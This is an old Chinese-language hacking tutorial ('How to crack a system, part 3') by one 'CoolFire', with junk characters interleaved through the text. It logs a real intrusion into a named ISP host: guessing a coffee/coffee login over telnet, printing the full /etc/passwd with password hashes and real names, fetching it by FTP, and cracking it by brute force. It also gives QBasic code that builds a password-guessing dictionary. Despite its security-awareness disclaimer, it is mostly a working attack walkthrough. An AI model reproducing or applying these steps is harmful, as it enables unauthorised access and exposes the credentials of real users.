如何破解系統(tǒng)（3）

這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!
5 y" t" R8 E% f+ r5 Y1 y
7 \3 k) v! A0 ]2 l0 n8 U前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號(hào)被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險(xiǎn)中, 為了找一個(gè)酷似網(wǎng)路咖啡站臺(tái)的
W3 密碼,誤入一個(gè)號(hào)稱第一個(gè)提供網(wǎng)路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
' Z' d  p7 {0 u& u7 C/ b之後, 使用了自己寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當(dāng)然我不可能這麼作啦!).
9 p& f* c4 l9 }/ E1 X
看看最近興起的網(wǎng)路咖啡及各大網(wǎng)站的系統(tǒng)安全設(shè)施, 再加上 CoolFire最近開會(huì)的時(shí)候遇到的情況, 不難發(fā)現(xiàn)我們的國(guó)家正往高科技的領(lǐng)域快步邁進(jìn), 但是這些系統(tǒng)的安全性若不加強(qiáng),可能到時(shí)候人家只要一臺(tái)電腦再加上一臺(tái)數(shù)據(jù)機(jī)就可以讓整個(gè)國(guó)家的金融及工商業(yè)崩潰!
; i: ?' c" l& C$ Z, O大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術(shù)上理應(yīng)比較強(qiáng), 但還是輕易讓人入侵, 且又沒有教導(dǎo)User 正確的網(wǎng)路使用觀念 (Password 的設(shè)定及 proxy 的使用等),實(shí)在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會(huì)是甚麼樣子 ??
( j: |5 z0 N) C) f- Y
' Q* A/ ]$ s+ P# d4 ^+ ]( I8 p這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應(yīng)該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習(xí)入侵, 就一定要知道最新的資訊 (入侵本國(guó)的網(wǎng)路則不用,反正沒人重視網(wǎng)路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!
6 p$ T3 X; d/ C3 l* W$ {
本次主題: 說明如何連接該 ISP 并且對(duì)其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說明: 由於本次主題說明重點(diǎn)使用真實(shí)的位址及名稱, 所以 CoolFire 已經(jīng) Mail給該網(wǎng)頁之維護(hù)人員更改密碼, 但該網(wǎng)頁之 ISP 仍為新手之練習(xí)好題材! CoolFire
+ |' K# b2 A( n( E( P8 Q+ wMail 給該網(wǎng)頁維護(hù)人員之信件內(nèi)容如下, 如果他還不盡快改掉, 我也沒辦法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 請(qǐng)速更動(dòng)網(wǎng)頁密碼
From: CoolFire <coolfires@hotmail.com>

6 F! w* J6 ^" N' R5 i  T9 @& Z) h你的網(wǎng)頁作得不錯(cuò), 但是因?yàn)槟闼O(shè)定的密碼太容易為駭客所? 入侵, 請(qǐng)於見到此信後速速更改你的網(wǎng)頁進(jìn)入密碼, 否則下次若網(wǎng)頁遭到篡改, 本人概不負(fù)責(zé)!!
; n: S5 y) q: M5 W8 @8 H# A/ n
**** 課程開始 ****
& x$ q; z0 s- D+ T3 ]
/ }1 x1 i, {+ W" I請(qǐng)注意: 由於本次所作的課程內(nèi)容以實(shí)作為主, 除了本人 IP 有所更改,一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請(qǐng)勿閱讀以下之詳細(xì)破解內(nèi)容,否則本人概不負(fù)責(zé)!
. Q* p$ s% j" i3 s1 t
6 B8 d! z5 Y, E(連線到某一主機(jī)之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
& k' v  o. w1 Tms.hinet.net.tw> telnet www.coffee.com.tw
5 ^0 E4 q  M. n# p' u% r2 Y7 N' JTrying 203.66.169.11...
* r* b/ S/ F7 S& d! C% nConnected to www.coffee.com.tw.
Escape character is '^]'.
; J+ _7 c& b8 g5 x: MPassword: (隨便按一下 Enter)
Login incorrect
& C9 \# R! a; o7 R* t; h7 e1 m
* M6 w7 Q1 b, _3 c$ T$ {( {$ H' uwww login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

0 C8 {& k( ?6 Q3 E8 D  y, q* [5 L歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
: v; L; E1 v7 t0 v2 e' t- R' O=================================================================

(直接進(jìn)入核心部份)
# l' O: k1 t* ~  Qwww:~$ cd /etc
www:/etc$ ls
+ c9 Q' J; r# m' I6 tDIR_COLORS hosts.equiv printcap
$ ^+ `+ m  S% ~  G) Q/ i  E% pHOSTNAME hosts.lpd profile
8 E$ \: W+ q& q; H5 N/ YNETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
4 A" U+ G& F- \. zX11@ inittab rc.d/
; I3 M, U/ w, i/ P1 ~at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
; t7 i1 I! G9 k6 b% ]csh.login issue.net securetty.old
; S  f/ ]) p0 Q$ A) {default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
0 E( u2 X5 G4 F% U) |' X, yftp.banner mail.rc slip.login
9 j' [6 f) C% [ftp.deny motd snooptab
1 c1 A" y& A3 s; ^5 ^0 P0 {( hftpaccess motd.bak sudoers
% H  u) U2 Q9 U# A! jftpconversions msgs/ syslog.conf
2 x( ^0 e3 g" z: H! O& Z8 Pftpgroups mtab syslog.pid
& s  z' A" i" k1 O, k1 `( p! Iftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
* a2 Q5 F9 V' Ehosts passwd.OLD yp.conf.example
hosts.allow passwd.old
! ^$ G( p' d* Mhosts.deny ppp/

% [6 V8 h7 {: b! c& h" ^$ L& H(看看我們的目標(biāo)長(zhǎng)得如何???)
; D3 S# P( M, u, Swww:/etc$ cat passwd
( D" m" z$ L2 E% s5 K+ x% [) Yroot:abcdefghijklmn:0:0:root:/root:/bin/bash
+ D- }% F3 I0 q; ebin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
. B# p9 T( W# `/ H) Aadm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
' O$ @* ?& U' d, xsync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
/ B6 W  g$ S7 \  K2 |) a, t1 mhalt:*:7:0:halt:/sbin:/sbin/halt
. k2 a4 g# Y7 n9 D( ~. ^/ i- h9 Lmail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
4 J. w! {. D7 X* x) T5 d6 mgames:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
$ _" Z- V% a' h2 S% @4 S* A' o% o8 apostmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
! F9 }3 w4 u' Q% N; J' `( |nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
7 p  u  i1 _9 [9 p+ e8 Zwww:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
# _( Q/ {' P1 e7 h: `  f' _women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
" h) E  Z/ {0 C5 M/ `  L4 f! \kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
" i  l7 g  X! T. V! P  @  wbakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
( K' T8 k! E7 p9 q$ I5 |haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
/ K9 ]& R' O4 J: N; |2 _+ \tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
; L& S% Y! u+ V7 Norder:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
0 d9 ~8 |! l' j& llilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
. ]. F6 i3 y2 i& \( X& y$ }0 c8 usupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
1 h% g* P8 J5 {, K* Gstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
# J5 W; l9 D9 N" x' L! vlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
2 R3 u/ r( y) ytaiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
+ M+ b( [: ^( Bsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
  E4 e* n. g9 b, c* s. Jkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
2 ~  D. ~/ M" m# D6 [recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
: U8 T& n! a; v1 _6 {8 msales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
7 W$ p! V  X: @  O8 jcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
9 C, u9 e6 x: _" ?# Djdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
5 \; ~' T/ C6 V6 e1 X0 g- C- `s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
" Y  V( ^: W; c# K: qnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
! S6 h+ R8 Y$ k  }. l" `7 \6 }. j- ~yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
! P2 i% R9 L3 i# q* I: ?6 Dbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
$ o8 C$ m: C9 p/ H, G) X( J3 fwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
  K+ @3 T1 i: J  g9 v! F  |kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
. l# c& F0 b3 E4 r, D2 G+ yfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash
* ]" m; u+ q. M% O* b9 ]
+ ~! u0 I% P' C(CoolFire 注: 因?yàn)槭褂?PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個(gè)一個(gè)試?yán)瞺~~ 我沒說喔!)

' z. }; P$ j) z$ O; Z9 |www:/etc$ exit
1 a2 g. X  X8 }6 W% S  _logout
Connection closed by foreign host.
' ?6 G1 k  S7 ]+ k! S8 h( @
(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)

' n& f" C% E0 Nms.hinet.net.tw> ftp www.coffee.com.tw
4 j0 k$ n; i9 l% i' {7 r7 X: QConnected to www.coffee.com.tw.
- b/ h+ S3 s, v* @5 x' {3 B2 ^220-
/ U2 [; @( L* c220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
0 R, @" }7 i3 Q6 U" z) y220-
6 h; P( T0 b! `, j220-
2 X& c9 k. g/ }  M9 o4 G/ w220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
9 ?' h- S2 x8 C0 c( c220- If you have any suggestion, please mail to:
8 c0 g( r4 H/ S7 j8 @5 u; {220- service@xx.xxxxxxx.xxx.xx.
220-
220-
2 q: K3 W/ ~7 s7 M2 k220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
. f. ?2 u7 t" X6 {
(還是使用剛剛的帳號(hào)進(jìn)入)

Name (www.coffee.com.tw:YourName): coffee
4 \; S& c+ X# x2 W7 |331 Password required for coffee.
* B8 m$ T, e, i2 Y& GPassword:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
0 l0 d. F( p. @+ a- O
+ e' I/ D  s0 [: q1 ]% y(直接到達(dá)檔案放置地點(diǎn))

; e) N1 W6 l+ t' Uftp> cd /etc
5 f0 F0 s3 X& s% T$ K- o: v5 E. A250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
) S4 J; N9 F$ c+ Vttys
fdprm
9 A, p* ?# A: S- Pgroup
issue
motd
8 S: I- r" P7 g' }' `2 Amtools
. Z; d' N/ ~) _3 c7 w+ d, B6 zprofile
securetty
shells
% {+ S& \% i) b4 {4 u/ K7 ~. @termcap
skel
4 \( f; L" X* u9 L  U5 Vcsh.cshrc
6 z1 `& q( ^( S; [0 n/ S( ^' ecsh.login
% @$ k9 |' f7 v0 i) ~lilo
inet
default
services
HOSTNAME
DIR_COLORS
& I( A: C$ _5 L& N$ Tpasswd
& X2 L, v/ Y- K7 x6 k2 @7 zpasswd.OLD
wtmp
4 N4 U1 X* N+ j) a% |! Putmp
gettydefs
inittab.gettyps.sample
ld.so.conf
0 u- \% @7 J# q# Zld.so.cache
at.deny
6 J. V) k: i$ v5 Xfs
magic
rc.d
syslog.conf
, h1 z! K6 Y9 J' M- ~6 `3 P: j. vprintcap
1 ^+ _7 p1 P; I$ [/ |3 Dinittab
sudoers
2 f7 _+ c2 M% N/ w) b+ {vga
diphosts
+ [  ^" D* n$ Kmail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
! Y/ M# d9 M% DNETWORKING
: S4 a9 E1 \- B* U$ fgateways
bootptab
exports
( l2 [2 g% m4 y' ?# W+ ^/ P3 }/ }* |  Jftpusers
. L2 Z# v% N' q; D4 X5 x0 vhost.conf
hosts
+ j6 `# ^( U6 \hosts.allow
* _+ A! q6 N% `) H1 \3 Uhosts.deny
hosts.equiv
4 C5 R5 O6 Y% J( einetd.conf
named.boot
networks
nntpserver
7 ^5 S/ i4 J* a: dprotocols
3 H# C3 Y1 t, L( u" F7 s3 c1 [resolv.conf
4 F  T& Z+ V2 P. S& u0 xrpc
* e( g) G; s8 ~9 y' \ftpaccess
hosts.lpd
+ c: k- s0 R+ Q8 C4 q' qftpconversions
- U( A( }/ x& Y( V1 @, D- Usnooptab
msgs
ftpgroups
) }* P0 h; Q" L8 B3 c& A4 fslip.login
slip.hosts
  Y2 U% K0 d: ]" G# X+ v2 g1 Hyp.conf.example
X11
, M3 A, s. O! u7 f& [6 \lilo.conf
' B8 E2 A3 f& B) n! vsendmail.cf
7 U0 Q' R7 r) u# d- c; F% `fstab
" w3 l$ K% ~  g# |' Qfastboot
# C, G. w- J. M) X- k2 i% S* wmtab
syslog.pid
klogd.pid
% ~' ^. W6 j2 pshutdownpid
localtime
* l) _5 n8 ]+ f1 A& y0 B# ppasswd.old
' E) G" g' v8 x7 Z$ h5 \ioctl.save
' w1 o' x- [0 C" R0 T1 f  L7 e" lpsdevtab
$ {" A! j: P3 \% s5 dftp.banner
ftp.deny
issue.net
motd.bak
7 p& P- y7 s* {7 t% D) ]: Isecuretty.old
' ?( b; ^' l" t& F5 s: K9 G226 Transfer complete.
/ ^# V! {* ~& y
2 ]: A) H0 X/ r; }6 u! l+ w! L(取回該檔案)
( V; Q' @0 `3 k
ftp> get passwd
8 Y, ]6 @2 `, u) m6 t7 M200 PORT command successful.
7 O: [. p4 E, L/ A2 H150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
, K- B+ F) b7 n! o4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(盡速離開)

: e# j( T# ^& }/ Xftp> bye
221 Goodbye.
) p- U; W5 ^; s
- V3 k" ?7 W* C7 J6 v好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
0 F4 M  C8 V/ T* x( ^+ Q!!快點(diǎn)跑一下, 讓它自動(dòng)產(chǎn)生字典檔案:
: K! s1 ^: \! \* r* K! Z' Z
: V1 [& j" v# B5 z# i0 {/ c5 UC:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
) H  B& A' K2 b2 s' Q/ ~% T
1 U, h9 y# J) H1 D7 ^% ]1 LThis tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

: ]2 N3 X2 f+ G, CYour Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe
* @; T' @* x% b5 d; K( K
PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
1 n$ x/ w0 I/ C& Z& mFETAG Software Development Co: http://www.showtower.com.tw/~fetag
- Y5 w& P# {& F+ G# q- Q, |. M
9 ]0 M7 q9 I; A5 xC:\hack>
7 e0 B3 Q7 [  T/ M3 U  o5 z
(這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì)放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force看看!)

) X* v1 J, c* ~
C:\hack>fbrute passwd @dic.cfe

2 V3 a! s/ ]' c4 e4 {" G  K& I* vBRUTE!, Unix Brute Force Hacking Routine. v2.0
! ~. e# o" J" I1 z3 m3 lCopyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

& y+ t9 r1 l; T( W; |　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
Attempts/Hits: 5184/9
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
# r1 a5 w- x% v7 A& b* g2 f
Taking list input from dic.cfe
. ^  l4 v( [* l/ u$ z+ q- SBeginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
+ U! b. a, N$ @3 C, A7 sMatch for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
$ T+ O. R) g9 I- kMatch for password coffee found! Username: coffee
& R$ Y5 u- k" c! h. {( k  bMatch for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

9 P- s  ?/ C; z+ l3 Q" e. tDone.
4 s) \5 W% M- F# j2 P& C3 i) G
/ |0 M& x& ^$ O. O9 lC:\hack>

) @; C7 M3 O- q, F' x& x% }看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來, 請(qǐng)各位讀者見量!
  l6 Q) v7 x0 Q7 C+ b* Z6 }( h
" ?  ]( J% d5 l' m& @. S8 |. }**** 再談密碼 ****

% V+ x) Y2 }7 Q3 |1 o( o8 X看了以上的破解示范, 就可以了解到許多人還是對(duì)於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來設(shè)計(jì)一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對(duì)許多人有很大的幫助,底下我們?cè)賮頊\顯的介紹一下字母密碼的產(chǎn)生方法, 相信對(duì)於你在 Hack 某站會(huì)有更大的幫助.
- b) t$ ?9 ?; l0 F
& C. @" l6 R* K  |. X4 m事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來 "自動(dòng)擴(kuò)大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對(duì)這位網(wǎng)友的問題作一個(gè)更詳細(xì)的說明 (因已簡(jiǎn)短回信答覆),并且寫出來讓大家了解一下, 當(dāng)然我們的示范還是使用 QBasic, 因?yàn)檫@是最容易找到的程式了,而且語法大家也可能會(huì)比較熟悉一點(diǎn), 如果我使用 VB 或 C 來寫, 可能有些人只會(huì)拿去用,而不會(huì)去修改或者寫個(gè)好一點(diǎn)的出來!

9 T, Q" Z- ?' p7 O* c5 P3 d先說明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來比較看看:

6 w& f5 P9 E$ p" Q+ }[1] apple [2] guest [3] james [4] superman [5] password

OK! 來看看! 如果你有一點(diǎn)英文的概念的話應(yīng)該會(huì)知道母音及子音吧 !
我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個(gè), 所有的英文單字都會(huì)有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
再來就是比較每個(gè)字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個(gè)子音再接一個(gè)母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請(qǐng)自行統(tǒng)計(jì)), 然後是結(jié)尾部份, 通常結(jié)尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個(gè)簡(jiǎn)單的, 其它大家自行發(fā)揮, 如果有人學(xué)語言學(xué)的, 請(qǐng)幫忙弄一份常用組合表出來, 可能會(huì)更有幫助吧 !!
# x* x0 ^& r/ G2 ]5 s# {, y5 X
底下就是該程式片段, 執(zhí)行後會(huì)產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個(gè)字的字典!!

--------------- MakeDic.BAS Start Here
# E1 F" Z8 H5 R8 g6 W-------------------------------------------------------------------------------
! l: s& d$ B+ z" x! i* g4 F/ _--------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)
5 X' ^/ u" w+ B( n  L4 A
, y8 Q# w) q/ \7 y: EDATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
9 ^; [) V; T: G9 o) Q! j- \"t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"
$ n1 \/ c! T/ s9 f8 {7 f
FOR I = 1 TO 20
! P4 j% H' ]9 L2 lREAD FirstWord$(I)
( o+ {) Z# o/ b% |1 P2 TPRINT FirstWord$(I)
+ @7 e# v" V( i; jNEXT I
/ p$ m+ ^; \& y! H, X
! d8 \9 K/ f3 O1 z. x$ k4 S6 CFOR I = 1 TO 13
# K8 ~% m7 w2 J* O: [/ o: H0 KREAD MotherWord$(I)
- Q3 H! g" U, \! gNEXT I

9 U" x2 l, L% i# I* f* SFOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1
0 F$ p, a; ^, H% G4 }
: z; G3 [! o$ K/ ~! E) LFOR I = 1 TO 20
" e  O8 L! j( z% m; IFOR J = 1 TO 13
4 b) ]) T& ]5 v/ [* GFOR K = 1 TO 12
- ]4 f, L% S& E! ~PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
# V% `. m1 C( S- N3 m# p' mNEXT K
NEXT J
% r% Q8 y4 k6 m! qNEXT I
. ?# |8 Z+ z; k/ A
- f; w+ r) m, zCLOSE : END
--------------- Cut Here, End of MakeDic.BAS
-------------------------------------------------------------------------------
-
5 [6 Y* }- R( q5 x$ |
當(dāng)然這只是小部份的組合, 相信你可以作出一個(gè)更大的字典檔出來, 如:
* k0 ~! ~2 l+ Y% }0 ]& _; {, I子音+母音+子音+母音+子音, 作出來的字典檔會(huì)很嚇人喔 !! 這一個(gè)部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,寫好了請(qǐng) Mail 一份給我喔 !! 如果可以的話請(qǐng)說明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!

7 q( `2 f) e- V5 G- X希望每次講到密碼的問題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對(duì)照看看,如果有相同的請(qǐng)趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
  S5 f' o- P# ~2 e/ w們.... 教教你們的使用者吧..... 唉~~~~
  L* w1 x$ O/ |4 d$ D2 d! A

**** 後語 ****

0 T; k- W: f9 t2 {) x! L我們的首頁感謝大家的支持, 現(xiàn)在人數(shù)已經(jīng)到達(dá) 2,000 了, 這是一個(gè)地下站(未對(duì)外正式公布) 很棒的一個(gè)數(shù)字, 在與其它工作室人員研究之後, 暫時(shí)不對(duì)外公布站址, 如果你是 "誤闖"到本站來的! 我們歡迎你的加入, 但目前尚不考慮對(duì)外公布站址, 請(qǐng)您在告訴你的朋友有這麼一個(gè)站存在的時(shí)候,請(qǐng)他不要隨便告訴別人 (請(qǐng)只告訴你信賴的朋友; 或?qū)﹄娔X有一份特別狂熱的人, 我們都?xì)g迎他們的加入),我們目前所采用的方式將是開放式的! 對(duì)首頁部份暫時(shí)不以密碼方式處理.
5 r" v; I" K8 a; t
& |: s7 O/ R! V) u% }** 不要 Crack 這個(gè)首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會(huì)完全關(guān)閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識(shí)", 不要利用它來奪取任何的 "權(quán)利",本首頁著重的是教育, 而不是一　的教導(dǎo)攻擊的方法, 希望大家對(duì)於政府機(jī)關(guān) (org.tw) 或教育機(jī)構(gòu) (edu.tw)不要作任何的破壞!!還有我的 ISP......:D
6 l. e: q# i3 N) j( n
------
哇! 一份案子搞了好久, 都沒時(shí)間維護(hù)網(wǎng)頁了, 所以特別將維護(hù)的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談?wù)勎易罱膶?shí)戰(zhàn)故事! 雖然沒時(shí)間寫網(wǎng)頁,但是還是會(huì)寫一些文件給大家作為參考 !!

------
